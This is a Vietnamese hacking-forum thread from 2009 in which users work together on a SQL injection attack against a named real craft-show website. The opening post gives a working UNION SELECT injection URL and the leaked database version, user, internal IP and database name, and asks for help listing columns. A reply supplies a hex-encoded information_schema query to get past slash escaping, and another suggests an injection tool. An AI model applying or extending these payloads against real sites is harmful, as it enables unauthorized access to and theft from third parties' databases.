[Discussion] http://www.indiecraftshows.com/events.php?id= |
16/07/2009 00:23:59 (+0700) | #1 | 186367 |
gla_ika
Member
|
0 |
|
|
Joined: 05/07/2009 00:04:54
Messages: 2
Offline
|
|
Hôm bữa gặp web này bị lỗi SQl tìm được table roi nhung không biết code tìm column trong table đó hjx .
Mấy mod giúp đỡ e cái ,thank
Địa chỉ nè:
http://www.indiecraftshows.com/events.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
5.0.77webuser@172.17.0.217indiecraftslive-->version ,user,database
mà ai co' link tut về lỗi này thì nhắn dùm cái tìm mỏi mòi con mắt mà chẳng thấy đâu cả. |
|
|
|
|
[Discussion] http://www.indiecraftshows.com/events.php?id= |
17/07/2009 12:17:46 (+0700) | #2 | 186565 |
lyhuuloi
Elite Member
|
0 |
|
|
Joined: 04/04/2003 11:29:17
Messages: 90
Location: TP HCM
Offline
|
|
Trước hết bác phải convert database indiecraftslive sang mã HEX đã, mình đã convert qua thì nó thì được: 696e6469656372616674736c697665 và câu lệnh mà bác chèn vào những số nào hiển thị trên web sẽ là:
Code:
(select table_name from information_schema.tables WHERE table_schema=0x696e6469656372616674736c697665)
Vì ở đây nó đã chèn slash để vô hiệu hóa, nên chuyển sang HEX là by pass Để làm được thì bác nên trang bị cho mình hành trang là kiến thức về SQL bác nhé, đừng nên học hack một cách máy móc Như vậy bác sẽ trở thành kẻ phá hoại chứ ko phải là một người làm nhiệm vụ Bảo mật.
Good lucks. |
|
http://lyhuuloi.com |
|
|
|
[Discussion] http://www.indiecraftshows.com/events.php?id= |
20/07/2009 02:17:34 (+0700) | #3 | 186832 |
gla_ika
Member
|
0 |
|
|
Joined: 05/07/2009 00:04:54
Messages: 2
Offline
|
|
thanks bác nhá ,thi` mình vẫn vừa học vừa thưc hành thôi,thấy bi' thì mới nhờ mấy bác chứ
Dù gì cũng cảm ơn bác |
|
|
[Discussion] http://www.indiecraftshows.com/events.php?id= |
08/08/2009 09:00:22 (+0700) | #4 | 189085 |
phuoctrung
Member
|
0 |
|
|
Joined: 22/03/2009 19:51:42
Messages: 88
Location: Vietnamese
Offline
|
|
bạn thử dùng SQLhelper xem sao? |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|